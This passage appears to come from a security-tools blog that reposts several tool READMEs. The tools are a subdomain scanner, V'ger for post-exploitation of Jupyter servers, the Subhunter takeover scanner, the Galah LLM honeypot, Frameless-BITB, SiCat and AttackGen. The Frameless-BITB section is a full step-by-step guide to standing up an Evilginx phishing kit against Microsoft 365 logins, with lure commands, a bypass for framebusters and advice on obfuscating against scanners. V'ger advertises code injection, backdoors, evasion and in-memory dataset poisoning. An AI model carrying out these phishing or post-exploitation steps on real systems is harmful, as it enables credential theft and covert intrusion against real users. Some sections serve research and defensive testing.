    One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

    Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org but something.ack.nmap.org might be. I can search for all subdomains of nmap.org but that defeats the purpose of having a subdomains as an input.

    License

    MIT License. See LICENSE for full text.



    Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

    By: Zion3R

    V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

    User Stories

    • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
    • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
    • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
    • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

    Usage

    Initial Setup

    1. pip install vger
    2. vger --help

    Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

    Commands

    Once a connection is established, users drop into a nested set of menus.

    The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

    These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

    Experimental

    With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

    There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

    Examples



    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R


    Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
    [+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.`

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    πŸ˜‘

    % curl http://localhost:8888/i-mean-are-you-a-fake-server`
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

    By: Zion3R


    A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

    This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


    Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

    β˜•οΈŽ Buy Me A Coffee

    Video Tutorial: πŸ‘‡

    Disclaimer

    This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

    Backstory - The Why

    Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

    That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

    The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

    In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

    The What

    A Browser In The Browser (BITB) without any iframes! As simple as that.

    Meaning that we can now use BITB with Evilginx on websites like Microsoft.

    Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

    The How

    Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

    Instructions

    Video Tutorial


    Local VM:

    Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

    Update and Upgrade system packages:

    sudo apt update && sudo apt upgrade -y

    Evilginx Setup:

    Optional:

    Create a new evilginx user, and add user to sudo group:

    sudo su

    adduser evilginx

    usermod -aG sudo evilginx

    Test that evilginx user is in sudo group:

    su - evilginx

    sudo ls -la /root

    Navigate to users home dir:

    cd /home/evilginx

    (You can do everything as sudo user as well since we're running everything locally)

    Setting Up Evilginx

    Download and build Evilginx: Official Docs

    Copy Evilginx files to /home/evilginx

    Install Go: Official Docs

    wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
    sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
    nano ~/.profile

    ADD: export PATH=$PATH:/usr/local/go/bin

    source ~/.profile

    Check:

    go version

    Install make:

    sudo apt install make

    Build Evilginx:

    cd /home/evilginx/evilginx2
    make

    Create a new directory for our evilginx build along with phishlets and redirectors:

    mkdir /home/evilginx/evilginx

    Copy build, phishlets, and redirectors:

    cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

    cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

    cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

    Ubuntu firewall quick fix (thanks to @kgretzky)

    sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

    On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

    sudo nano /etc/systemd/resolved.conf

    edit/add the DNSStubListener to no > DNSStubListener=no

    then

    sudo systemctl restart systemd-resolved

    Modify Evilginx Configurations:

    Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

    nano ~/.evilginx/config.json

    CHANGE https_port from 443 to 8443

    Install Apache2 and Enable Mods:

    Install Apache2:

    sudo apt install apache2 -y

    Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

    sudo a2enmod proxy
    sudo a2enmod proxy_http
    sudo a2enmod proxy_balancer
    sudo a2enmod lbmethod_byrequests
    sudo a2enmod env
    sudo a2enmod include
    sudo a2enmod setenvif
    sudo a2enmod ssl
    sudo a2ensite default-ssl
    sudo a2enmod cache
    sudo a2enmod substitute
    sudo a2enmod headers
    sudo a2enmod rewrite
    sudo a2dismod access_compat

    Start and enable Apache:

    sudo systemctl start apache2
    sudo systemctl enable apache2

    Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

    Clone this Repo:

    Install git if not already available:

    sudo apt -y install git

    Clone this repo:

    git clone https://github.com/waelmas/frameless-bitb
    cd frameless-bitb

    Apache Custom Pages:

    Make directories for the pages we will be serving:

    • home: (Optional) Homepage (at base domain)
    • primary: Landing page (background)
    • secondary: BITB Window (foreground)
    sudo mkdir /var/www/home
    sudo mkdir /var/www/primary
    sudo mkdir /var/www/secondary

    Copy the directories for each page:


    sudo cp -r ./pages/home/ /var/www/

    sudo cp -r ./pages/primary/ /var/www/

    sudo cp -r ./pages/secondary/ /var/www/

    Optional: Remove the default Apache page (not used):

    sudo rm -r /var/www/html/

    Copy the O365 phishlet to phishlets directory:

    sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

    Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

    Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

    Self-signed SSL certificates:

    Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

    We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

    Create dir and parents if they do not exist:

    sudo mkdir -p /etc/ssl/localcerts/fake.com/

    Generate the SSL certs using the OpenSSL config file:

    sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
    -config openssl-local.cnf

    Modify private key permissions:

    sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

    Apache Custom Configs:

    Copy custom substitution files (the core of our approach):

    sudo cp -r ./custom-subs /etc/apache2/custom-subs

    Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

    Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

    # Uncomment the one you want and remember to restart Apache after any changes:
    #Include /etc/apache2/custom-subs/win-chrome.conf
    Include /etc/apache2/custom-subs/mac-chrome.conf

    Simply to make it easier, I included both versions as separate files for this next step.

    Windows/Chrome BITB:

    sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Mac/Chrome BITB:

    sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Test Apache configs to ensure there are no errors:

    sudo apache2ctl configtest

    Restart Apache to apply changes:

    sudo systemctl restart apache2

    Modifying Hosts:

    Get the IP of the VM using ifconfig and note it somewhere for the next step.

    We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

    On Windows:

    Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

    Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

    C:\Windows\System32\drivers\etc\

    Change the file types (bottom-right) to "All files".

    Double-click the file named hosts

    On Mac:

    Open a terminal and run the following:

    sudo nano /private/etc/hosts

    Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

    # Local Apache and Evilginx Setup
    [IP] login.fake.com
    [IP] account.fake.com
    [IP] sso.fake.com
    [IP] www.fake.com
    [IP] portal.fake.com
    [IP] fake.com
    # End of section

    Save and exit.

    Now restart your browser before moving to the next step.

    Note: On Mac, use the following command to flush the DNS cache:

    sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

    Important Note:

    This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

    Trusting the Self-Signed SSL Certs:

    Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

    For this step, it's easier to follow the video instructions, but here is the gist anyway.

    Open https://fake.com/ in your Chrome browser.

    Ignore the Unsafe Site warning and proceed to the page.

    Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

    Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

    On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

    Now RESTART your Browser

    You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

    Running Evilginx:

    At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

    Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

    sudo apt install tmux -y

    Start Evilginx in developer mode (using tmux to avoid losing the session):

    tmux new-session -s evilginx
    cd ~/evilginx/
    ./evilginx -developer

    (To re-attach to the tmux session use tmux attach-session -t evilginx)

    Evilginx Config:

    config domain fake.com
    config ipv4 127.0.0.1

    IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

    blacklist noadd

    Setup Phishlet and Lure:

    phishlets hostname O365 fake.com
    phishlets enable O365
    lures create O365
    lures get-url 0

    Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

    Useful Resources

    Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

    Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

    My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

    How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

    Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

    TODO

    • Create script(s) to automate most of the steps


    Sicat - The Useful Exploit Finder

    By: Zion3R

    Introduction

    SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

    SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


    SiCat Resources

    Installation

    git clone https://github.com/justakazh/sicat.git && cd sicat

    pip install -r requirements.txt

    Usage


    ~$ python sicat.py --help

    Command Line Options:

    Command Description
    -h Show help message and exit
    -k KEYWORD
    -kv KEYWORK_VERSION
    -nm Identify via nmap output
    --nvd Use NVD as info source
    --packetstorm Use PacketStorm as info source
    --exploitdb Use ExploitDB as info source
    --exploitalert Use ExploitAlert as info source
    --msfmoduke Use metasploit as info source
    -o OUTPUT Path to save output to
    -ot OUTPUT_TYPE Output file type: json or html

    Examples

    From keyword


    python sicat.py -k telerik --exploitdb --msfmodule

    From nmap output


    nmap --open -sV localhost -oX nmap_out.xml
    python sicat.py -nm nmap_out.xml --packetstorm

    To-do

    • [ ] Input from nmap result from pipeline
    • [ ] Nmap multiple host support
    • [ ] Search NSE Script
    • [ ] Search by PORT

    Contribution

    I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



    Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

    By: Zion3R


    AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


    Star the Repo

    If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

    Features

    • Generates unique incident response scenarios based on chosen threat actor groups.
    • Allows you to specify your organisation's size and industry for a tailored scenario.
    • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
    • Create custom scenarios based on a selection of ATT&CK techniques.
    • Capture user feedback on the quality of the generated scenarios.
    • Downloadable scenarios in Markdown format.
    • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
    • Available as a Docker container image for easy deployment.
    • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


    Releases

    v0.4 (current)

    What's new? Why is it useful?
    Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
    Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
    Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
    Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

    v0.3

    What's new? Why is it useful?
    Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

